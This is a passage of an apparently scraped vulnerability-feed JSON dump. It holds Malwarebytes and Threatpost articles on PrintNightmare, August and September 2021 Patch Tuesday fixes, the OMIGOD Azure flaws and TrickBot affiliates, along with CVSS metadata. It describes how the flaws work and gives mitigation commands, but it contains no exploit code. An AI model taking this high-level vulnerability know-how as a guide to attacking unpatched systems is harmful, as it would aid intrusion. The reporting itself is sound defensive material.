"3.1"}, "impactScore": 5.9}, "published": "2021-07-01T14:08:26", "type": "malwarebytes", "title": "PrintNightmare 0-day can be used to take over Windows domain controllers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-01T14:08:26", "id": "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-11T14:38:54", "description": "The sheer number of patches (44 security vulnerabilities) should be enough to scare us, but unfortunately we have gotten used to those numbers. In fact, 44 is a low number compared to what we have seen on recent Patch Tuesdays. So what are the most notable vulnerabilities that were patched.\n\n * One actively exploited vulnerability\n * One vulnerability that has a CVSS score of 9.9 out of 10\n * And yet another attempt to fix PrintNightmare\n\nLet\u2019s go over these worst cases to get an idea of what we are up against.\n\n### CVEs\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\n### Actively exploited\n\n[CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>) is an [elevation of privilege (EoP)](<https://blog.malwarebytes.com/glossary/privilege-escalation/>) vulnerability in the Windows Update Medic Service. The Windows Update Medic Service is a background service that was introduced with Windows 10 and handles the updating process. Its only purpose is to repair the Windows Update service so that your PC can continue to receive updates unhindered. Besides on Windows 10 it also runs on Windows Server 2019. According to Microsoft CVE-2021-36948 is being actively exploited, but it is not aware of exploit code publicly available. [Reportedly](<https://blog.automox.com/automox-experts-weigh-in-august-patch-tuesday-2021>), the exploit is both low complexity and can be exploited without user interaction, making this an easy vulnerability to include in an adversaries toolbox. The bug is only locally exploitable, but local elevation of privilege is exactly what ransomware gangs will be looking to do after breaching a network, for example.\n\n### 9.9 out of 10\n\n[CVE-2021-34535](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34535>) is a [Remote Code Execution (RCE)](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>) vulnerability in Windows TCP/IP. This is remotely exploitable by a malicious Hyper-V guest sending an ipv6 ping to the Hyper-V host. An attacker could send a specially crafted TCPIP packet to its host. This vulnerability exists in the TCP/IP protocol stack identified in Windows 7 and newer Microsoft operating systems, including servers.\n\nThis vulnerability received a CVSS score of 9.9 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.\n\n### 9.8 out of 10\n\nAnother high scorer is [CVE-2021-26432](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26432>), an RCE in the Windows Services for NFS ONCRPC XDR Driver. Open Network Computing (ONC) Remote Procedure Call (RPC) is a remote procedure call system. ONC was originally developed by Sun Microsystems. The NFS protocol is independent of the type of operating system, network architecture, and transport protocols. The Windows service for the driver makes sure that Windows computers can use this protocol. This vulnerability got a high score because it is known to be easy to exploit and can be initiated remotely.\n\n### More RDP\n\n[CVE-2021-34535](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34535>) is an RCE in the Remote Desktop Client. Microsoft lists two exploit scenarios for this vulnerability:\n\n * In the case of a Remote Desktop connection, an attacker with control of a Remote Desktop Server could trigger a remote code execution (RCE) on the machine when a victim connects to the attacking server with the vulnerable Remote Desktop Client.\n * In the case of Hyper-V, a malicious program running in a guest VM could trigger guest-to-host RCE by exploiting this vulnerability in the Hyper-V Viewer when a victim running on the host connects to the attacking Hyper-V guest.\n\nSince this is a client-side vulnerability, an attacker would have to convince a user to authenticate to a malicious RDP server, where the server could then trigger the bug on the client side. Combined with other RDP weaknesses however, this vulnerability would be easy to chain into a full system take-over.\n\n### Never-ending nightmare of PrintNightmare\n\nThe Print Spooler service was subject to yet more patching. The researchers behind PrintNightmare predicted that it would be a fertile ground for further discoveries, and they seem to be right. I\u2019d be tempted to advise Microsoft to start from scratch instead of patching patches on a very old chunk of code.\n\n[CVE-2021-36936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36936>) an RCE vulnerability in Windows Print Spooler. A vulnerability that was publicly disclosed, which may be related to several bugs in Print Spooler that were identified by researchers over the past few months (presumably PrintNightmare).\n\n[CVE-2021-34481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>) and [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) are RCE vulnerabilities that could allow attackers to run arbitrary code with SYSTEM privileges.\n\nMicrosoft said the Print Spooler patch it pushed this time should address all publicly documented security problems with the service. In an unusual step, it has made a breaking change: \u201cToday we are addressing this risk by changing the default Point and Print driver installation and update behavior to require administrator privileges.\u201d\n\nTo be continued, we suspect.\n\nThe post [PrintNightmare and RDP RCE among major issues tackled by Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T12:16:17", "type": "malwarebytes", "title": "PrintNightmare and RDP RCE among major issues tackled by Patch Tuesday", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26432", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36948"], "modified": "2021-08-11T12:16:17", "id": "MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T16:35:06", "description": "The September 2021 Patch Tuesday could be remembered as the _final_ patching attempt in the PrintNightmare\u2026 nightmare. The ease with which the vulnerabilities [shrugged off the August patches](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/>) doesn\u2019t look to get a rerun. So far we haven\u2019t seen any indications that this patch is so easy to circumvent.\n\nThe total count of fixes for this Patch Tuesday tallies up to 86, including 26 for Microsoft Edge alone. Only a few of these vulnerabilities are listed as zero-days and two of them are "old friends". There is a third, less-likely-to-be-exploited one, and then we get to introduce a whole new set of vulnerabilities nicknamed OMIGOD, for reasons that will become obvious.\n\nAzure was the subject of five CVE\u2019s, one of them listed as critical. The four that affect the Open Management Infrastructure (OMI) were found by researchers, grouped together and received the nickname OMIGOD.\n\n### PrintNightmare\n\nPrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a malicious printer driver to a vulnerable machine, and could use their new-found superpowers to install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe problem was made worse by significant [confusion](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) about whether PrintNightmare was a known, patched problem or an entirely new problem, and by repeated, at best partially-successful, attempts to patch it.\n\nThis month, Microsoft patched the remaining Print Spooler vulnerabilities under [CVE-2021-36958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36958>). Fingers crossed.\n\n### MSHTML\n\nThis zero-day vulnerability that felt like a ghost from the past (it involved ActiveX, remember that?) was only [found last week](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>), but has attracted significant attention. It was listed as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), a Remote Code Execution (RCE) vulnerability in Microsoft MSHTML. \n\nThreat actors were sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe hacker was able to follow step-by-step instructions in order to launch their own attacks. Microsoft published mitigation instructions that disabled the installation of new ActiveX controls, but this turned out to be easy to work around for attackers.\n\nGiven the short window of opportunity, there was some doubt about whether a fix would be included in this Patch Tuesday, but it looks like Microsoft managed to pull it off.\n\n### DNS elevation of privilege vulnerability\n\nThis vulnerability was listed as [CVE-2021-36968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968>) and affects systems running Windows Server 2008 R2 SP1, SP2 and Windows 7 SP1. It exists due to an application that does not properly impose security restrictions in Windows DNS. The vulnerability is listed as a zero-day because it has been publicly disclosed, not because it is actively being exploited.\n\nMicrosoft says that exploitation is \u201cless likely\u201d, perhaps because it requires initial authentication and can only be exploited locally. If these conditions are met this bug can be used to accomplish elevation of privilege (EoP). \n\n### OMIGOD\n\nOMIGOD is the name for a set of four vulnerabilities in the Open Management Infrastructure (OMI) that you will find embedded in many popular Azure services. The CVEs are:\n\n * [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647>) OMI RCE Vulnerability with a [CVSS score](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) of 9.8 out of 10.\n * [CVE-2021-38648](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648>) Open Management Infrastructure Elevation of Privilege Vulnerability\n * [CVE-2021-38645](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38645>) Open Management Infrastructure Elevation of Privilege Vulnerability\n * [CVE-2021-38649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38649>) Open Management Infrastructure Elevation of Privilege Vulnerability\n\nThe [researchers](<https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution>) that discovered the vulnerabilities consider OMIGOD to be a result of the supply-chain risks that come with using open-source code:\n\n> Wiz\u2019s research team recently discovered a series of alarming vulnerabilities that highlight the supply chain risk of open source code, particularly for customers of cloud computing services.\n\nOMI runs as root (the highest privilege level) and is activated within Azure when users enable certain services, like distributed logging, or other management tools and services. It's likely that many users aren't even aware they have it running.\n\nThe RCE vulnerability (CVE-2021-38647) can be exploited in situations where the OMI ports are accessible to the Internet to allow for remote management. In this configuration, any user can communicate with it using a UNIX socket or via an HTTP API, and any user can abuse it to remotely execute code or escalate privileges.\n\nA coding mistake means that any incoming request to the service _without_ an authorization header has its privileges default to uid=0, gid=0, which is root. \n \nOMIGOD, right?\n\nThe researchers report that the flaw can only be used to remotely takeover a target when OMI exposes the HTTPS management port externally. This is the default configuration when installed standalone and in Azure Configuration Management or System Center Operations Manager (SCOM). Other Azure services (such as Log Analytics) do not expose this port, so in those cases the scope is limited to local privilege escalation.\n\nThey advise all Azure customers to connect to their Azure VMs and run the commands below in their terminal to ensure OMI is updated to the latest version:\n\n * For Debian systems (e.g., Ubuntu): `dpkg -l omi`\n * For Redhat based system (e.g., Fedora, CentOS, RHEL): `rpm -qa omi`\n\nIf OMI isn\u2019t installed, the commands won't return any results, and your machine isn\u2019t vulnerable. Version 1.6.8.1 is the patched version. All earlier versions need to be patched.\n\n## Update September 17, 2021\n\nAfter a proof-of-concept exploit was published on code hosting website GitHub, attackers we re noticed to be looking for Linux servers running on Microsoft\u2019s Azure cloud infrastructure. These systems are vulnerable to the security flaw called OMIGOD.\n\nAccording to reports from security researchers the attackers use the OMIGOD exploit, to deploy malware that ensnares the hacked server into cryptomining or DDoS botnets.\n\nThe post [[updated] Patch now! PrintNightmare over, MSHTML fixed, a new horror appears \u2026 OMIGOD](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-15T13:19:48", "type": "malwarebytes", "title": "[updated] Patch now! PrintNightmare over, MSHTML fixed, a new horror appears \u2026 OMIGOD", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36958", "CVE-2021-36968", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444"], "modified": "2021-09-15T13:19:48", "id": "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-07-19T16:25:33", "description": "Microsoft has warned of yet another vulnerability that\u2019s been discovered in its Windows Print Spooler that can allow attackers to elevate privilege to gain full user rights to a system. The advisory comes on the heels of patching two other remote code-execution (RCE) bugs found in the print service that collectively became known as PrintNightmare.\n\nThe company released [the advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) late Thursday for the latest bug, a Windows Print Spooler elevation-of-privilege vulnerability tracked as [CVE-2021-34481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34481>). Microsoft credited Dragos vulnerability researcher Jacob Baines for identifying the issue.\n\nThe vulnerability \u201cexists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to Microsoft.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nAttackers who successfully exploit the bug can run arbitrary code with SYSTEM privileges, allowing them to install programs, view, change or delete data, or create new accounts with full user rights, the company said.\n\nTo work around the bug, administrators and users should stop and disable the Print Spooler service, Microsoft said.\n\n## **Slightly Less of a \u2018PrintNightmare\u2019**\n\nThe vulnerability is the latest in a flurry of problems discovered in Windows Print Spooler, but seems slightly less dangerous, as it can only be exploited locally. It rates 7.8 out of 10 on the CVSS vulnerability-severity scale.\n\nIndeed, [Baines told BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-guidance-on-new-windows-print-spooler-vulnerability/>) that while the bug is print driver-related, \u201cthe attack is not really related to PrintNightmare.\u201d Baines plans to disclose more about the little-known vulnerability in [an upcoming presentation](<https://defcon.org/html/defcon-29/dc-29-speakers.html#baines>) at DEF CON in August.\n\nThe entire saga surrounding Windows Print Spooler [began Tuesday, June 30](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), when a proof-of-concept (PoC) for an initial vulnerability in the print service was dropped on GitHub showing how an attacker can exploit the flaw to take control of an affected system.\n\nThe response to the situation soon turned into confusion. Though Microsoft released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in it its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), fixing what it thought was a minor elevation-of-privilege vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after it became clear to many experts that Microsoft\u2019s initial patch didn\u2019t fix the entire problem. The federal government even stepped in last Thursday, when CERT/CC [offered its own mitigation](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) for PrintNightmare that Microsoft has since adopted \u2014 advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.\n\nTo further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appeared to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527. The company explained that the second bug was similar to the earlier PrintNightmare vulnerability but also its own distinct entity.\n\nEventually, Microsoft last Wednesday [released an emergency cumulative patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>) for both PrintNightmare bugs that included all previous patches as well as protections for CVE-2021-1675 as well as a new fix for CVE-2021-34527.\n\nHowever, that fix also [was incomplete](<https://www.kb.cert.org/vuls/id/383432>), and Microsoft continues to work on further remediations as it also works to patch this latest bug, CVE-2021-34481. In the meantime, affected customers should install the most recent Microsoft updates as well as use the workaround to avoid exploitation, the company said.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T11:57:53", "type": "threatpost", "title": "Microsoft: Unpatched Bug in Windows Print Spooler", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527"], "modified": "2021-07-16T11:57:53", "id": "THREATPOST:A8242348917526090B7A1B23735D5C6C", "href": "https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T07:53:10", "description": "Microsoft has released an emergency patch for the PrintNightmare, a set of two critical remote code-execution (RCE) vulnerabilities in the Windows Print Spooler service that hackers can use to take over an infected system. However, more fixes are necessary before all Windows systems affected by the bug are completely protected, according to the federal government.\n\nMicrosoft on Tuesday released an [out-of-band update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for several versions of Windows to address [CVE-2021-34527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527>), the second of two bugs that were initially thought to be one flaw and which have been dubbed PrintNightmare by security researchers.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nHowever, the latest fix only appears to address the RCE variants of PrintNightmare, and not the local privilege escalation (LPE) variant, according to an [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare>) by the Cybersecurity Infrastructure and Security Administration (CISA), citing a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) published by the CERT Coordination Center (CERT/CC).\n\nMoreover, the updates do not include Windows 10 version 1607, Windows Server 2012 or Windows Server 2016, which will be patched at a later date, according to CERT/CC.\n\n## **A Tale of Two Vulnerabilities**\n\nThe PrintNightmare saga [began last Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) when a proof-of-concept (PoC) exploit for the vulnerability \u2014 at that time tracked as CVE-2021-1675 \u2014 was dropped on GitHub showing how an attacker can exploit the vulnerability to take control of an affected system. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform.\n\nThe response to the situation soon turned into confusion. Though Microsoft released an [patch for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in it its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), addressing what it thought was a minor EoP vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, it soon became clear to many experts that Microsoft\u2019s initial patch didn\u2019t fix the entire problem. CERT/CC on Thursday offered its own workaround for PrintNightmare, advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.\n\nTo further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appeared to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote in the advisory at the time. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\n## **Microsoft Issues Incomplete Patch**\n\nThe fix released this week addresses CVE-2021-34527, and includes protections for CVE-2021-1675, according to the CISA, which is encouraging users and administrators to review the [Microsoft Security Updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) as well as [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.\n\nBut as noted, it won\u2019t fix all systems.\n\nSo, in cases where a system is not protected by the patch, Microsoft is offering several workarounds for PrintNightmare. One is very similar to the federal government\u2019s solution from last week: To stop and disable the Print Spooler service \u2014 and thus the ability to print both locally and remotely \u2014 by using the following PowerShell commands: Stop-Service -Name Spooler -Force and Set-Service -Name Spooler -StartupType Disabled.\n\nThe second workaround is to disable inbound remote printing through Group Policy by disabling the \u201cAllow Print Spooler to accept client connections\u201d policy to block remote attacks, and then restarting the system. In this case, the system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nAnother potential option to prevent remote exploitation of the bug that has worked in \u201climited testing\u201d is to block both the RPC Endpoint Mapper (135/tcp) and SMB (139/tcp and 445/tcp) at the firewall level, according to CERT/CC. However, \u201cblocking these ports on a Windows system may prevent expected capabilities from functioning properly, especially on a system that functions as a server,\u201d the center advised.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-07T10:55:02", "type": "threatpost", "title": "Microsoft Releases Emergency Patch for PrintNightmare Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T10:55:02", "id": "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "href": "https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-06T21:23:56", "description": "The U.S. government has stepped in to offer a mitigation for a critical remote code execution (RCE) vulnerability in the Windows Print Spooler service that may not have been fully patched by Microsoft\u2019s initial effort to fix it.\n\nTo mitigate the bug, [dubbed PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), the CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for CVE-2021-1675 urging system administrations to disable the Windows Print Spooler service in Domain Controllers and systems that do not print, the Cybersecurity Infratructure and Security Administration (CISA) said [in a release](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) Thursday. CERT/CC is part of the Software Engineering Institute, a federally funded research center operated by Carnegie Mellon University.\n\n\u201cWhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) configured with the NoWarningNoElevationOnInstall option configured,\u201d CERT/CC researchers wrote in the note.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe mitigation is in response to a scenario that unfolded earlier this week when a proof-of-concept (POC) for PrintNightmare was dropped on GitHub on Tuesday. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform. An attacker can use the POC to exploit the vulnerability to take control of an affected system.\n\nIn the meantime, Microsoft Thursday put out a new advisory of its own on PrintNightmare that assigns a new CVE and seems to suggest a new attack vector while attempting to clarify confusion that has arisen over it.\n\nWhile the company originally addressed CVE-2021-1675 in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) as a minor elevation-of-privilege vulnerability, the listing was updated last week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after it became clear to many experts that the patch appears to fail against the RCE aspect of the bug\u2014hence CISA\u2019s offer of another mitigation and Microsoft\u2019s update.\n\n## **Assignment of New CVE?**\n\nRegarding the latter, the company dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) Thursday for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appears to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\nThe description of the bug sounds like PrintNightmare; indeed, Microsoft acknowledges that it is \u201can evolving situation.\n\n\u201cA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to the notice. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nIn a \u201cFAQ\u201d section in the security update, Microsoft attempts to explain CVE-2021-34527\u2019s connection to CVE-2021-1675.\n\n\u201cIs this the vulnerability that has been referred to publicly as PrintNightmare? Yes, Microsoft has assigned CVE-2021-34527 to this vulnerability,\u201d the company wrote.\n\nHowever, the answer to the question \u201cIs this vulnerability related to CVE-2021-1675?\u201d suggests that CVE-2021-34527 is a different issue.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nMicrosoft goes on to explain that CVE-2021-34527 existed before the June Patch Tuesday updates and that it affects domain controllers in \u201call versions of Windows.\u201d\n\n**\u201c**We are still investigating whether all versions are exploitable,\u201d the company wrote. \u201cWe will update this CVE when that information is evident.\u201d\n\nMicrosoft did not assign a score to CVE-2021-34527, citing its ongoing investigation.\n\n## **Two Vulnerabilities?**\n\nIn retrospect, one security researcher noted to Threatpost when news of PrintNightmare surfaced Tuesday that it was \u201ccurious\u201d that the CVE for the original vulnerability was \u201c-1675,\u201d observing that \u201cmost of the CVEs Microsoft patched in June are -31000 and higher.\u201d\n\n\u201cThis could be an indicator that they have known about this bug for some time, and fully addressing it is not trivial,\u201d Dustin Childs of Trend Micro\u2019s Zero Day Initiative told Threatpost at the time.\n\nNow it appears that perhaps Microsoft was patching only part of a more complex vulnerability. The likely scenario appears to be that there are two bugs in Windows Print Spooler that could offer attackers some kind of exploit chain or be used separately to take over systems.\n\nWhile one flaw may indeed have been addressed in June\u2019s Patch Tuesday update, the other could be mitigated by CERT/CC\u2019s workaround\u2014or could remain to be patched by a future Microsoft update that comes after the company completes its investigation.\n\nThe company\u2019s release Thursday of a new CVE related to PrintNightmare seems to be an initial attempt to clarify the situation, though given its developing nature, it remains a bit hazy for now.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-02T12:21:02", "type": "threatpost", "title": "CISA Offers New Mitigation for PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-07-02T12:21:02", "id": "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "href": "https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-15T18:06:14", "description": "The cybercriminals behind the infamous TrickBot trojan have signed two additional distribution affiliates, dubbed Hive0106 (aka TA551) and Hive0107 by IBM X-Force. The result? Escalating ransomware hits on corporations, especially using the Conti ransomware.\n\nThe development also speaks to the TrickBot gang\u2019s increasing sophistication and standing in the cybercrime underground, IBM researchers said: \u201cThis latest development demonstrates the strength of its connections within the cybercriminal ecosystem and its ability to leverage these relationships to expand the number of organizations infected with its malware.\u201d\n\nThe TrickBot malware started life as a banking trojan back in 2016, but it quickly evolved to become a modular, full-service threat. It\u2019s capable of a range of backdoor and data-theft functions, can deliver additional payloads, and has the ability to quickly [move laterally](<https://threatpost.com/trickbot-port-scanning-module/163615/>) throughout an enterprise.\n\nAccording to IBM, the TrickBot gang (aka ITG23 or Wizard Spider) has now added powerful additional distribution tactics to its bag of tricks, thanks to the two new affiliates.\n\n\u201cEarlier this year, [the TrickBot gang] primarily relied on email campaigns delivering Excel documents and a call-center ruse known as BazarCall to deliver its payloads to corporate users,\u201d IBM researchers said in a [Wednesday analysis](<https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/>). \u201cHowever\u2026the new affiliates have added the use of hijacked email threads and fraudulent website 